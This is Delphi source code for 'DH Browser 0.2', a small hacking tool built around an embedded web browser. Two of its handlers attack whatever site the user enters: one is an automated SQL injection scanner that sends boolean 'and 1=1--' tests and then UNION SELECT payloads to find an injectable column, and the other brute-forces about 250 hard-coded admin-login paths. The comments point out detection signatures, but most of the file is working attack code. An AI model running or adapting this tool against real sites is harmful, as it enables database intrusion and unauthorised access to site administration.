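// DH Browser 0.2
// (C) Doddy Hackman 2013
// Credits :
// Navigate based on : http://www.swissdelphicenter.ch/torry/showcode.php?id=2242
// FindText based on : http://delphi.cjcsoft.net/viewthread.php?tid=47143
// Get HTML based on : http://delphi.about.com/od/adptips2005/qt/webbrowserhtml.htm
//
// Main (and only) form of the application: an embedded TWebBrowser with an
// address box (sEdit1), an optional custom-header memo (sMemo1), a raw-HTML
// view (sMemo2) with a find dialog, and two buttons that issue HTTP requests
// to the host named in sEdit1 (sButton2Click / sButton3Click).

unit programa;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, sSkinManager, StdCtrls, sButton, sEdit, OleCtrls, SHDocVw, sMemo,
  sListBox, sGroupBox, sLabel, sCheckBox, ComCtrls, sStatusBar, acPNG, ExtCtrls,
  mshtml, Menus, PerlRegEx, IdBaseComponent, IdComponent, IdTCPConnection,
  IdTCPClient, IdHTTP, acProgressBar;

type
  TForm2 = class(TForm)
    sSkinManager1: TsSkinManager;
    sGroupBox1: TsGroupBox;
    sEdit1: TsEdit;             // target URL typed by the user
    sButton1: TsButton;         // Navigate
    sGroupBox2: TsGroupBox;
    sMemo1: TsMemo;             // extra HTTP headers sent when sCheckBox1 is checked
    sCheckBox1: TsCheckBox;
    sGroupBox3: TsGroupBox;
    sStatusBar1: TsStatusBar;
    WebBrowser1: TWebBrowser;
    sGroupBox4: TsGroupBox;
    sButton2: TsButton;
    sButton3: TsButton;
    sGroupBox5: TsGroupBox;
    sButton4: TsButton;         // opens FindDialog1
    sLabel1: TsLabel;
    Image1: TImage;
    sMemo2: TsMemo;             // raw HTML of the last completed download
    PopupMenu1: TPopupMenu;
    S1: TMenuItem;              // show HTML view
    S2: TMenuItem;              // show browser view
    IdHTTP1: TIdHTTP;
    PerlRegEx1: TPerlRegEx;
    FindDialog1: TFindDialog;
    sProgressBar1: TsProgressBar;
    procedure sButton1Click(Sender: TObject);
    procedure S1Click(Sender: TObject);
    procedure S2Click(Sender: TObject);
    procedure sButton3Click(Sender: TObject);
    procedure sButton2Click(Sender: TObject);
    procedure sButton4Click(Sender: TObject);
    procedure FindDialog1Find(Sender: TObject);
    procedure FormClose(Sender: TObject; var Action: TCloseAction);
    procedure WebBrowser1ProgressChange(ASender: TObject;
      Progress, ProgressMax: Integer);
    procedure WebBrowser1DownloadComplete(Sender: TObject);
    procedure FormCreate(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form2: TForm2;

implementation

{$R *.dfm}

procedure TForm2.FindDialog1Find(Sender: TObject);
// FindText based on : http://delphi.cjcsoft.net/viewthread.php?tid=47143
// Finds the next occurrence of the dialog's FindText in sMemo2, starting after
// the current selection, and selects it; the memo receives focus either way.
// Fixes versus the original implementation:
//  - GetMem takes a size in bytes while PChar/StrPCopy/GetTextBuf work in
//    Chars, so on a Unicode Delphi the buffers were half the required size
//    (heap overflow); sizes are now multiplied by SizeOf(Char).
//  - the text length was held in a Word; a memo holding a whole page of HTML
//    exceeds 65535 characters and the allocation size wrapped around.
//  - the search offset is clamped to the buffer so a selection that no longer
//    fits the text cannot make StrPos read past the allocation.
//  - both buffers are released (they leaked on every search).
var
  needle: PChar;     // null-terminated copy of FindText
  haystack: PChar;   // null-terminated copy of the memo text
  hit: PChar;        // first match at or after the search offset, nil if none
  bufChars: Integer; // memo length in Chars including the terminator
  startOfs: Integer; // Char offset at which the search resumes
begin
  with Sender as TFindDialog do
  begin
    GetMem(needle, (Length(FindText) + 1) * SizeOf(Char));
    try
      StrPCopy(needle, FindText);
      bufChars := sMemo2.GetTextLen + 1;
      GetMem(haystack, bufChars * SizeOf(Char));
      try
        sMemo2.GetTextBuf(haystack, bufChars);
        // Resume right after the current selection; clamping to the
        // terminator turns an out-of-range selection into "not found".
        startOfs := sMemo2.SelStart + sMemo2.SelLength;
        if startOfs < 0 then
          startOfs := 0
        else if startOfs > bufChars - 1 then
          startOfs := bufChars - 1;
        hit := StrPos(haystack + startOfs, needle);
        if hit <> nil then
        begin
          sMemo2.SelStart := hit - haystack;
          sMemo2.SelLength := Length(FindText);
        end;
      finally
        FreeMem(haystack);
      end;
    finally
      FreeMem(needle);
    end;
    sMemo2.SetFocus;
  end;
end;

procedure TForm2.FormClose(Sender: TObject; var Action: TCloseAction);
// Closing the main form ends the whole process.
begin
  Application.Terminate;
end;

procedure TForm2.FormCreate(Sender: TObject);
// Loads the 'tv-b' skin from the 'Data' folder next to the executable.
begin
  sSkinManager1.SkinDirectory := ExtractFilePath(Application.ExeName) + 'Data';
  sSkinManager1.SkinName := 'tv-b';
  sSkinManager1.Active := True;
end;

procedure TForm2.S1Click(Sender: TObject);
// Popup menu: switch to the raw-HTML view.
begin
  WebBrowser1.Visible := false;
  sMemo2.Visible := True;
end;

procedure TForm2.S2Click(Sender: TObject);
// Popup menu: switch back to the rendered browser view.
begin
  WebBrowser1.Visible := True;
  sMemo2.Visible := false;
end;

procedure TForm2.sButton1Click(Sender: TObject);
// Navigate based on : http://www.swissdelphicenter.ch/torry/showcode.php?id=2242
// Navigates WebBrowser1 to the URL in sEdit1, bypassing the cache in both
// directions. When sCheckBox1 is checked the text of sMemo1 is passed verbatim
// as the extra request headers (no validation or normalisation is done here).
var
  cabeceras: OLEVariant; // extra HTTP headers, or '' when disabled
  uno: OLEVariant;       // navigation flags
  dos: OLEVariant;       // target frame (unused)
  tres: OLEVariant;      // POST data (unused)
begin
  uno := navNoReadFromCache or navNoWriteToCache;
  dos := '';
  tres := '';
  if (sCheckBox1.Checked) then
  begin
    cabeceras := sMemo1.Text;
    WebBrowser1.Navigate(sEdit1.Text, uno, dos, tres, cabeceras);
  end
  else
  begin
    cabeceras := '';
    WebBrowser1.Navigate(sEdit1.Text, uno, dos, tres, cabeceras);
  end;
end;

procedure TForm2.sButton2Click(Sender: TObject);
// Sends a series of HTTP GET requests built from the URL in sEdit1 to the
// remote host through IdHTTP1 and compares the responses; when PerlRegEx1
// matches, the generated URL replaces the contents of sEdit1. The status bar
// is updated before each request.
// Detection note: every request carries the literal marker 0x4b30425241
// (the hex encoding of 'K0BRA', which is what the regex below looks for) and
// the fixed '+and+' / '--' fragments, so this traffic is straightforward to
// signature in web-server or WAF logs.
// Abort raises EAbort, which the VCL swallows silently, so the '[+] Done'
// update after the loop is skipped once a match is found. Exceptions raised
// by IdHTTP1.Get (e.g. non-2xx responses) are not handled in this procedure.
var
  pass1: string;
  pass2: string;
  code: string;
  urltest: string;
  urlgen: string;
  full: string;
  codedos: string;
  i: Integer;
begin
  sStatusBar1.Panels[0].Text := '[+] SQLI Scanning ...';
  Form2.sStatusBar1.Update;
  pass1 := '+';
  pass2 := '--';
  urltest := 'concat(0x4b30425241,1,0x4b30425241)';
  sStatusBar1.Panels[0].Text := '[+] Checking ...';
  Form2.sStatusBar1.Update;
  code := IdHTTP1.Get(sEdit1.Text + '1' + pass1 + 'and' + pass1 + '1=1' + pass2);
  codedos := IdHTTP1.Get(sEdit1.Text + '1' + pass1 + 'and' + pass1 + '1=0' + pass2);
  if not(code = codedos) then
  begin
    sStatusBar1.Panels[0].Text := '[+] Finding columns number';
    Form2.sStatusBar1.Update;
    urltest := '1' + pass1 + 'and' + pass1 + '1=0' + pass1 + 'union' + pass1 +
      'select' + pass1 + 'concat(0x4b30425241,1,0x4b30425241)';
    urlgen := '1';
    for i := 2 to 36 do
    begin
      sStatusBar1.Panels[0].Text := '[+] Columns Length : ' + IntToStr(i);
      Form2.sStatusBar1.Update;
      urltest := urltest + ',concat(0x4b30425241,' + IntToStr(i) + ',0x4b30425241)';
      urlgen := urlgen + ',' + IntToStr(i);
      code := IdHTTP1.Get(sEdit1.Text + urltest + pass2);
      PerlRegEx1.Regex := 'K0BRA(.*?)K0BRA';
      PerlRegEx1.Subject := code;
      if PerlRegEx1.Match then
      begin
        // The matched number in urlgen is replaced by a marker word and the
        // resulting URL is written back to the address box.
        urlgen := StringReplace(urlgen, PerlRegEx1.SubExpressions[1], 'hackman', []);
        full := sEdit1.Text + '1' + pass1 + 'and' + pass1 + '1=0' + pass1 +
          'union' + pass1 + 'select' + pass1 + urlgen;
        sEdit1.Text := full;
        Abort;
      end;
    end;
  end;
  sStatusBar1.Panels[0].Text := '[+] Done';
  Form2.sStatusBar1.Update;
end;

procedure TForm2.sButton3Click(Sender: TObject);
// Requests each entry of the fixed `paginas` list appended to the URL in
// sEdit1 on a private TIdHTTP, stopping at the first one that answers 200;
// that path is then appended to sEdit1. Every exception raised inside the loop
// body (Indy protocol errors included) is discarded by the except clause. The
// `control` flag plus Abort end the loop on the next iteration; EAbort is
// swallowed by the VCL, so the final '[+] Done' update is normally skipped
// once a match is found.
// Detection note: the list is static and is requested sequentially in a fixed
// order, which is an easily recognisable pattern in web-server access logs.
const
  paginas: array [1 .. 250] of string = (
    'admin/admin.asp', 'admin/login.asp', 'admin/index.asp', 'admin/admin.aspx',
    'admin/login.aspx', 'admin/index.aspx', 'admin/webmaster.asp',
    'admin/webmaster.aspx', 'asp/admin/index.asp', 'asp/admin/index.aspx',
    'asp/admin/admin.asp', 'asp/admin/admin.aspx', 'asp/admin/webmaster.asp',
    'asp/admin/webmaster.aspx', 'admin/', 'login.asp', 'login.aspx', 'admin.asp',
    'admin.aspx', 'webmaster.aspx', 'webmaster.asp', 'login/index.asp',
    'login/index.aspx', 'login/login.asp', 'login/login.aspx', 'login/admin.asp',
    'login/admin.aspx', 'administracion/index.asp', 'administracion/index.aspx',
    'administracion/login.asp', 'administracion/login.aspx',
    'administracion/webmaster.asp', 'administracion/webmaster.aspx',
    'administracion/admin.asp', 'administracion/admin.aspx', 'php/admin/',
    'admin/admin.php', 'admin/index.php', 'admin/login.php', 'admin/system.php',
    'admin/ingresar.php', 'admin/administrador.php', 'admin/default.php',
    'administracion/', 'administracion/index.php', 'administracion/login.php',
    'administracion/ingresar.php', 'administracion/admin.php', 'administration/',
    'administration/index.php', 'administration/login.php',
    'administrator/index.php', 'administrator/login.php',
    'administrator/system.php', 'system/', 'system/login.php', 'admin.php',
    'login.php', 'administrador.php', 'administration.php', 'administrator.php',
    'admin1.html', 'admin1.php', 'admin2.php', 'admin2.html', 'yonetim.php',
    'yonetim.html', 'yonetici.php', 'yonetici.html', 'adm/', 'admin/account.php',
    'admin/account.html', 'admin/index.html', 'admin/login.html',
    'admin/home.php', 'admin/controlpanel.html', 'admin/controlpanel.php',
    'admin.html', 'admin/cp.php', 'admin/cp.html', 'cp.php', 'cp.html',
    'administrator/', 'administrator/index.html', 'administrator/login.html',
    'administrator/account.html', 'administrator/account.php',
    'administrator.html', 'login.html', 'modelsearch/login.php', 'moderator.php',
    'moderator.html', 'moderator/login.php', 'moderator/login.html',
    'moderator/admin.php', 'moderator/admin.html', 'moderator/', 'account.php',
    'account.html', 'controlpanel/', 'controlpanel.php', 'controlpanel.html',
    'admincontrol.php', 'admincontrol.html', 'adminpanel.php', 'adminpanel.html',
    'admin1.asp', 'admin2.asp', 'yonetim.asp', 'yonetici.asp',
    'admin/account.asp', 'admin/home.asp', 'admin/controlpanel.asp',
    'admin/cp.asp', 'cp.asp', 'administrator/index.asp',
    'administrator/login.asp', 'administrator/account.asp', 'administrator.asp',
    'modelsearch/login.asp', 'moderator.asp', 'moderator/login.asp',
    'moderator/admin.asp', 'account.asp', 'controlpanel.asp', 'admincontrol.asp',
    'adminpanel.asp', 'fileadmin/', 'fileadmin.php', 'fileadmin.asp',
    'fileadmin.html', 'administration.html', 'sysadmin.php', 'sysadmin.html',
    'phpmyadmin/', 'myadmin/', 'sysadmin.asp', 'sysadmin/', 'ur-admin.asp',
    'ur-admin.php', 'ur-admin.html', 'ur-admin/', 'Server.php', 'Server.html',
    'Server.asp', 'Server/', 'wpadmin/', 'administr8.php', 'administr8.html',
    'administr8/', 'administr8.asp', 'webadmin/', 'webadmin.php', 'webadmin.asp',
    'webadmin.html', 'administratie/', 'admins/', 'admins.php', 'admins.asp',
    'admins.html', 'administrivia/', 'Database_Administration/', 'WebAdmin/',
    'useradmin/', 'sysadmins/', 'admin1/', 'systemadministration/',
    'administrators/', 'pgadmin/', 'directadmin/', 'staradmin/',
    'ServerAdministrator/', 'SysAdmin/', 'administer/', 'LiveUser_Admin/',
    'sysadmin/', 'typo3/', 'panel/', 'cpanel/', 'cPanel/', 'cpanel_file/',
    'platz_login/', 'rcLogin/', 'blogindex/', 'formslogin/', 'autologin/',
    'support_login/', 'meta_login/', 'manuallogin/', 'simpleLogin/', 'loginflat/',
    'utility_login/', 'showlogin/', 'memlogin/', 'members/', 'login-redirect/',
    'sublogin/', 'wplogin/', 'login1/', 'dirlogin/', 'login_db/', 'xlogin/',
    'smblogin/', 'customer_login/', 'UserLogin/', 'loginus/', 'acct_login/',
    'admin_area/', 'bigadmin/', 'project-admins/', 'phppgadmin/', 'pureadmin/',
    'sqladmin/', 'radmind/', 'openvpnadmin/', 'wizmysqladmin/', 'vadmind/',
    'ezsqliteadmin/', 'hpwebjetadmin/', 'newsadmin/', 'adminpro/',
    'Lotus_Domino_Admin/', 'bbadmin/', 'vmailadmin/', 'Indy_admin/',
    'ccp14admin/', 'irc-macadmin/', 'banneradmin/', 'sshadmin/', 'phpldapadmin/',
    'macadmin/', 'administratoraccounts/', 'admin4_account/', 'admin4_colon/',
    'radmind1/', 'SuperAdmin/', 'AdminTools/', 'cmsadmin/', 'SysAdmin2/',
    'globes_admin/', 'cadmins/', 'phpSQLiteAdmin/', 'navSiteAdmin/',
    'server_admin_small/', 'logo_sysadmin/', 'server/',
    'database_administration/', 'power_user/', 'system_administration/',
    'ss_vms_admin_sm/');
var
  IdHTTP: TIdHTTP;
  i: Integer;
  control: Integer; // 1 once a path answered 200, 0 otherwise
begin
  control := 0;
  sStatusBar1.Panels[0].Text := '[+] Finding Panel ....';
  Form2.sStatusBar1.Update;
  IdHTTP := TIdHTTP.Create(nil);
  for i := Low(paginas) to High(paginas) do
    if (control = 1) then
    begin
      Abort;
    end
    else
    begin
      try
        sStatusBar1.Panels[0].Text := '[+] Testing : ' + paginas[i];
        Form2.sStatusBar1.Update;
        IdHTTP.Get(sEdit1.Text + '/' + paginas[i]);
        if IdHTTP.ResponseCode = 200 then
        begin
          sStatusBar1.Panels[0].Text := '[+] Done';
          Form2.sStatusBar1.Update;
          sEdit1.Text := sEdit1.Text + '/' + paginas[i];
          control := 1;
        end;
      except
        // Both handlers intentionally discard the error and move on to the
        // next entry.
        on E: EIdHttpProtocolException do
          ;
        on E: Exception do
          ;
      end;
    end;
  sStatusBar1.Panels[0].Text := '[+] Done';
  Form2.sStatusBar1.Update;
end;

procedure TForm2.sButton4Click(Sender: TObject);
// Opens the find dialog; the actual search runs in FindDialog1Find.
begin
  FindDialog1.Execute;
end;

procedure TForm2.WebBrowser1DownloadComplete(Sender: TObject);
// Resets the progress bar and copies the outerHTML of the document's root
// element into sMemo2 (the raw-HTML view). Any exception during the copy is
// discarded, so the memo simply stays empty when no document is available
// (presumably the case before the first navigation finishes).
var
  buscador: IHTMLElement; // walks from <body> up to the root element
begin
  sProgressBar1.Position := 0;
  // Get HTML based on : http://delphi.about.com/od/adptips2005/qt/webbrowserhtml.htm
  begin
    try
      begin
        sMemo2.Clear;
        buscador := (WebBrowser1.Document AS IHTMLDocument2).body;
        while not(buscador.parentElement = nil) do
        begin
          buscador := buscador.parentElement;
        end;
        sMemo2.Lines.Add(buscador.outerHTML);
      end;
    except
      // Best effort: leave sMemo2 cleared if the document cannot be read.
    end;
  end;
end;

procedure TForm2.WebBrowser1ProgressChange(ASender: TObject;
  Progress, ProgressMax: Integer);
// Mirrors the browser's download progress in sProgressBar1.
begin
  sProgressBar1.Max := ProgressMax;
  sProgressBar1.Position := Progress;
end;

end.
// The End ?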